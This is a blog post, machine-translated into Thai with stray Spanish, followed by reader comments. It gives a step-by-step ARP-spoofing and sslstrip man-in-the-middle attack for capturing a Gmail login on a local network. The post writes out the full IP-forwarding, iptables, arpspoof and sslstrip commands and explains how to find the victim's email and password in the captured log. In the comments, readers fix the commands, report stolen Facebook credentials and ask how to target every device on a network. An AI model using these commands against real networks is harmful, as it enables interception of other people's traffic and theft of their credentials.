ArpSpoofing และ SSlstrip ในการดำเนินการ

สวัสดีชาวบล็อก

สำหรับวันนี้ฉันมีตัวอย่างเล็ก ๆ น้อย ๆ ว่าการเชื่อมต่อในเครือข่ายใด ๆ ที่ไม่มีความปลอดภัยอาจเป็นอันตรายได้อย่างที่พวกเราหลายคนชอบ

สำหรับวันนี้ฉันจะใช้ ArpSpoofing กับ Sslstrip เพื่อรับรหัสผ่าน Gmail เพื่อให้สภาพแวดล้อมควบคุมได้ดีขึ้นฉันได้สร้างบัญชีชื่อ "testarp@gmail.com"

และเนื่องจากฉันไม่ชอบคำนำมากนักเรามาทำธุรกิจกันดีกว่า

ฉันไม่รับผิดชอบต่อสิ่งที่พวกเขาสามารถทำได้เมื่อใดก็ได้กับข้อมูลต่อไปนี้ ฉันทำเพื่อการศึกษาโดยเฉพาะ

สิ่งแวดล้อม

สำหรับการทดสอบนี้เรามีดังต่อไปนี้:

1. ผู้โจมตี: เป็นคอมพิวเตอร์เดสก์ท็อปหรือเดสก์ท็อปของฉันที่มี Debian Wheezy จากที่เก็บคุณสามารถติดตั้งได้ sslสตริป y ดมกลิ่น ที่จะได้รับ การแอบถ่าย

2. เหยื่อ: เหยื่อเป็นแท็บเล็ต Android ที่ต้องการดูเมลของเขาผ่านเบราว์เซอร์เท่านั้น

3. สื่อ: ตรงกลางคือไฟล์ เราเตอร์ Cisco DPC2425

ที่อยู่

ที่อยู่ผู้โจมตี: 172.26.0.2

ที่อยู่เราเตอร์: 172.26.0.1

ที่อยู่ของเหยื่อ: 172.26.0.8

การโจมตี:

หากต้องการทำความเข้าใจเพิ่มเติมเล็กน้อยว่าการโจมตีทำงานอย่างไรคุณสามารถไปที่หน้าเก่าของฉัน POST

สิ่งแรกที่เราจะทำสำหรับการโจมตีนี้คือการเปิดใช้งานการส่งต่อเพื่อให้คอมพิวเตอร์ของเราสามารถส่งต่อข้อมูลไปยังเหยื่อโดยที่พวกเขาไม่รู้ตัว (มิฉะนั้นจะเป็นการโจมตีแบบปฏิเสธบริการ)

เพื่อที่เราจะใช้:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

แต่ละคำสั่งในหน้าต่างคอนโซลโดยตรง

Ahora si hacemos tail -f desdelinux vemos la informacion en vivo y en directo

ภาพรวม 1

แล้วเราจะได้สิ่งที่ต้องการได้อย่างไร?

ก่อนอื่นให้ป้อนอีเมลของเราบนแท็บเล็ต ขณะเข้าสู่ระบบเราจะเห็นว่ามีสิ่งต่างๆมากมายหลายพันรายการปรากฏบนคอนโซลของเรา

Ahora que ha terminado vamos a abrir nuestro archivo “desdelinux” con nano

nano desdelinux

ด้วย Control + W เราค้นหาสิ่งที่เรียกว่า SECURE POST

แล้วเราจะเห็นอะไรแบบนี้

ภาพรวม 2

ในบรรดาบรรทัดใหญ่ที่มองไม่เห็นคืออีเมลและรหัสผ่านของเหยื่อ

เราจึงวิ่งไปทางขวาจนในที่สุดก็เห็นแสงสว่างที่ปลายอุโมงค์

ภาพรวม 3

ในอีกโอกาสหนึ่งเราจะมาดูกันว่าเราจะป้องกันตัวเองได้อย่างไรจากการโจมตี

ความนับถือ


แสดงความคิดเห็นของคุณ

อีเมล์ของคุณจะไม่ถูกเผยแพร่ ช่องที่ต้องการถูกทำเครื่องหมายด้วย *

*

*

  1. ผู้รับผิดชอบข้อมูล: Miguel ÁngelGatón
  2. วัตถุประสงค์ของข้อมูล: ควบคุมสแปมการจัดการความคิดเห็น
  3. ถูกต้องตามกฎหมาย: ความยินยอมของคุณ
  4. การสื่อสารข้อมูล: ข้อมูลจะไม่ถูกสื่อสารไปยังบุคคลที่สามยกเว้นตามข้อผูกพันทางกฎหมาย
  5. การจัดเก็บข้อมูล: ฐานข้อมูลที่โฮสต์โดย Occentus Networks (EU)
  6. สิทธิ์: คุณสามารถ จำกัด กู้คืนและลบข้อมูลของคุณได้ตลอดเวลา

  1.   @Jlcmux dijo

    ฉันใช้โอกาสนี้เพื่อบอกว่าเมื่อโพสต์เผยแพร่คำสั่งไม่ถูกต้อง

    คำสั่ง iptables ในตอนท้ายไม่มี 8080 ที่ถูกทิ้งไว้ในบรรทัดอื่น แล้วคำสั่ง arpspoof ก็อยู่ในบรรทัดเดียวกัน แต่ละคำสั่งอยู่คนละบรรทัดกัน

    หวังว่าผู้แก้ไขจะเห็นและสามารถแก้ไขได้

    อาศิรพจน์

    1.    มานูเอล เด ลา ฟูเอนเต dijo

      ฉันได้ทำการแก้ไขที่คุณพูดถึงเรียบร้อยแล้วใช่ไหม

      หากคุณกำลังจะแทรกโค้ดในรายการที่ต้องการให้ใช้มุมมอง HTML และตรวจสอบว่าบทความนั้นถูกต้องก่อนที่จะส่งไปยังรอดำเนินการ ขอขอบคุณ.

  2.   หลุยส์ dijo

    เป็นเรื่องที่น่ารู้ว่าพวกเราที่ไม่มีความรู้นั้นช่างเปราะบางเหลือเกิน ข้อมูลที่ดีมากแม้ว่าฉันจะเข้าใจเรื่องเล็กน้อย แต่ฉันก็ตระหนักถึงความสำคัญ ขอขอบคุณ!
    ความนับถือ

  3.   กิสการ์ด dijo

    แต่จะใช้ได้เฉพาะในกรณีที่ผู้โจมตีและเหยื่ออยู่ในเครือข่ายเดียวกัน ไม่ว่าในกรณีใดฉันคิดว่าถ้า (อยู่ในเครือข่ายเดียวกัน) คุณเชื่อมต่อโดยใช้ HTTPS ซึ่งไม่เกิดขึ้นเนื่องจากข้อมูลถูกเข้ารหัสก่อนออกจากเครื่องของคุณ หากคุณเชื่อมต่อด้วย HTTP (ไม่มี S) ฉันคิดว่าแม้มองไปที่สายเคเบิลเครือข่ายคุณก็เห็นคีย์

    1.    @Jlcmux dijo

      มันไม่เป็นความจริง ฉันแฮ็ครหัสผ่าน gmail และหากคุณสังเกตเห็นว่า gmail ใช้ https ดังนั้น? ประเด็นคือแม้ว่า https จะปลอดภัย แต่ก็ขึ้นอยู่กับ http ดังนั้นจึงไม่ปลอดภัย

      อย่าสารภาพมากเกี่ยวกับ https ว่า S ไม่ใช่สำหรับ Superman มันมีไว้เพื่อ "ปลอดภัย"

    2.    รเทน dijo

      มันใช้งานได้โดยมีหรือไม่มี https ฉันได้ลองใช้ linux distro ที่เชี่ยวชาญกว่าแล้วและใช้งานได้โดยไม่มีปัญหา

    3.    มานูเอล เด ลา ฟูเอนเต dijo

      คุณสามารถใช้เพื่อสอนบทเรียนแก่ผู้ที่ขโมย Wi-Fi ของคุณได้อย่างแม่นยำ 😀

      ไม่มากก็น้อยเหมือนสิ่งที่พวกเขาพูดเมื่อนานมาแล้วในบล็อกของ Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    เรยอง dijo

        Ostia ยอดเยี่ยมมากมันทำอะไร! / แล้วพวกเขาก็บอกความหวาดระแวงของฉันทุกครั้งที่ฉันใช้ VPN เมื่อพวกเขาไปตรวจสอบบัญชีธนาคาร ... ) ยังไงก็ตามคุณต้องดูว่าคนที่ดูถูกเหยียดหยามในความคิดเห็นนั้นเป็นอย่างไร ... ถ้าในที่สุดมันก็ขโมย ...

        1.    Eliotime3000 dijo

          ตอนนี้เราต้องเรียนรู้เกี่ยวกับวิธีสร้างและเสนอบริการ VPN ของคุณเอง

      2.    แดเนียล dijo

        เรื่องราวที่คุณเชื่อมโยงนั้นน่าสนใจมากดูเหมือนว่าควรค่าแก่การเป็นหนังสือนวนิยายและทำให้ฉันจำได้ว่าเมื่อฉันใช้อินเทอร์เน็ตของเพื่อนบ้านและแม้ว่าฉันจะบอกว่าฉันรู้เรื่องนี้ แต่ฉันคิดว่าฉันไม่เคยเห็นมิติที่แท้จริงของอันตรายที่ฉันสามารถมีได้ สุดท้ายโชคดีสำหรับฉันพวกเขาเปลี่ยนรหัสผ่านเป็น WPA2 เท่านั้นและนั่นคือจุดเริ่มต้นเรื่องราวของฉันกับ ISP ฮ่าฮ่า

    4.    มอริเชียส dijo

      นั่นเป็นเหตุผลที่ชื่อกล่าวว่า Sslstrip กำลังดำเนินการอยู่

      ใช้งานได้ตราบเท่าที่ผู้โจมตีอยู่ตรงกลาง

  4.   ไม่ช้า dijo

    คุณทำงานกับปริซึมคลื่นใด - -
    ไม่
    คุณจะรออะไรเพื่อส่งคำขอ XD
    ขอแสดงความนับถือ
    โพสต์ที่ดี

  5.   auroszx dijo

    น่าสนใจฉันจะทำการทดสอบทางการศึกษาในภายหลัง ... บางทีฉันอาจจะลบรหัสผ่านไปยัง WiFi และสนุกไปอีกหน่อย😛
    คุณสามารถทำสิ่งที่คล้ายกันเพื่อส่งหน้าต่างๆไปยังหน้าที่เป้าหมายที่ร้องขอได้หรือไม่? ตัวอย่างเช่นพวกเขาต้องการเปิด Facebook และฉันเปลี่ยนเส้นทางไปที่ Google? 😛

    1.    @Jlcmux dijo

      ใช่. แต่มันเป็นม้วนที่แตกต่างกันมาก

      บางทีฉันจะโพสต์ในภายหลัง

  6.   ใหม่ล่าสุด dijo

    โพสต์ที่ดีมากหัวข้อเหล่านี้ให้ความรู้มากตอนนี้เราต้องสามารถตอบโต้การโจมตีนี้ได้เนื่องจากบางส่วน (เช่นฉัน) เชื่อมต่อกับเครือข่ายสาธารณะ (เช่นมหาวิทยาลัย) การหลีกเลี่ยงจะเป็นประโยชน์

    ทักทาย!

  7.   just-an-other-dl-ผู้ใช้ dijo

    มันไม่ได้ผลสำหรับฉัน🙁

  8.   ว้าว dijo

    มีบางอย่างทำให้ฉันล้มเหลวที่นี่นอกเหนือจากข้อเท็จจริงที่ว่าการเชื่อมต่อ https ถูกเข้ารหัสผ่านใบรับรองเซิร์ฟเวอร์ (เมื่อคุณมีใบรับรองในเครื่องของคุณเบราว์เซอร์ของคุณจะรับผิดชอบการเข้ารหัส) ด้วย iptables ที่คุณเปลี่ยนเส้นทางพอร์ต 80 (http) ไม่ใช่ 443 ซึ่งเป็น https

    1.    @Jlcmux dijo

      ฉันก็คิดแบบนั้นเหมือนกัน ประเด็นคือแม้ว่า https จะ "ปลอดภัย" แต่น่าเสียดายที่ขึ้นอยู่กับ http ดังนั้น sslstrip จึงใช้ประโยชน์จากสิ่งนั้นมันทำให้เบราว์เซอร์เชื่อว่ากำลังใช้ข้อมูลประจำตัว https แต่ไม่ใช่

      1.    ว้าว dijo

        อึศักดิ์สิทธิ์! แต่เบราว์เซอร์จะเห็นคำเตือนเช่น "ใบรับรองนี้มาจากไซต์ที่น่าสงสัยหรืออะไรทำนองนั้น" ... ฉันจะต้องทำการทดสอบ XD แน่นอน

        1.    @Jlcmux dijo

          ไม่มีอะไรออกมาอย่างแน่นอน

  9.   just-an-other-dl-ผู้ใช้ dijo

    ในที่สุดมันก็ได้ผลสำหรับฉัน
    ฉันเชื่อมต่อกับเครือข่าย WEP ด้วยรหัสผ่านและแสดงรหัสผ่านโดยตรง

    แบบสอบถาม คุณสามารถทำขั้นตอนเดียวกันนี้ได้หรือไม่ แต่สำหรับคอมพิวเตอร์ทุกเครื่องที่เชื่อมต่อในเครือข่ายแทนที่จะมีเหยื่อคนเดียว

    1.    @Jlcmux dijo

      ใช่คุณสามารถ. แต่ฉันยังไม่ได้ทำการทดลอง ลองด้วยตัวคุณเองและบอกเราว่าคุณเป็นอย่างไร

  10.   ซินนิค 19 dijo

    สิ่งเดียวที่ฉันได้รับจากสิ่งนี้คือเครื่องของเหยื่อออฟไลน์ แต่ sslstrip ไม่แสดงอะไรเลย: /

    1.    @Jlcmux dijo

      คุณต้องปิดการใช้งานไฟร์วอลล์สักครู่ หรืออย่างน้อยก็เปิดใช้งานการเชื่อมต่อขาเข้า

  11.   นายดำ dijo

    โพรบและฉันสามารถเห็นชื่อผู้ใช้และรหัสผ่านของหน้า Facebook เท่านั้นใน gmail ฉันไม่พบผลลัพธ์ใด ๆ ในบันทึกและฉันต้องการเพียงบรรทัดของ arpspoof « arpspoof -i -t « ในทางกลับกันเครื่องเหยื่อไม่สามารถเปิดบางเพจได้ ฉันจะดำเนินการตรวจสอบต่อไปมันน่าสนใจมาก ความช่วยเหลือสำหรับผู้ที่ใช้ Manjaro แพ็คเกจที่จะติดตั้ง ได้แก่ dsniff (ในที่นี้คือ arpspoff), twisted และ python2-pyopenssl สามารถดาวน์โหลด Sslstrip ได้จากที่นี่: http://www.thoughtcrime.org/software/sslstrip/
    เพื่อเรียกใช้ $ python2 sslstrip.py
    อาศิรพจน์

  12.   นายดำ dijo

    มันไม่ออกมา แต่บรรทัด arpspoof คือ #arpspoof -i int -t ip-เหยื่อ ip-router

  13.   กิลเบิร์ dijo

    ดูสิฉันทำตามที่คุณพูด:

    echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    ปัญหาคือเหยื่อที่เป็นพีซีเครื่องอื่นที่ฉันมีที่นี่ในห้องของฉันฉันไม่มีการเชื่อมต่อกับจุดที่ฉันต้องรีสตาร์ทเราเตอร์ฉันจะช่วยอะไรได้บ้าง

    อีกสิ่งหนึ่งที่ฉันกำลังทำงานกับเครื่องเสมือนและเมื่อฉันรันคำสั่ง iwconfig wlan0 จะไม่ปรากฏขึ้นและเมื่อฉันรัน ifconfig อย่างไรก็ตามหากฉันมีอินเทอร์เน็ตบนเครื่องเสมือนของฉันด้วยอินเทอร์เฟซ eth0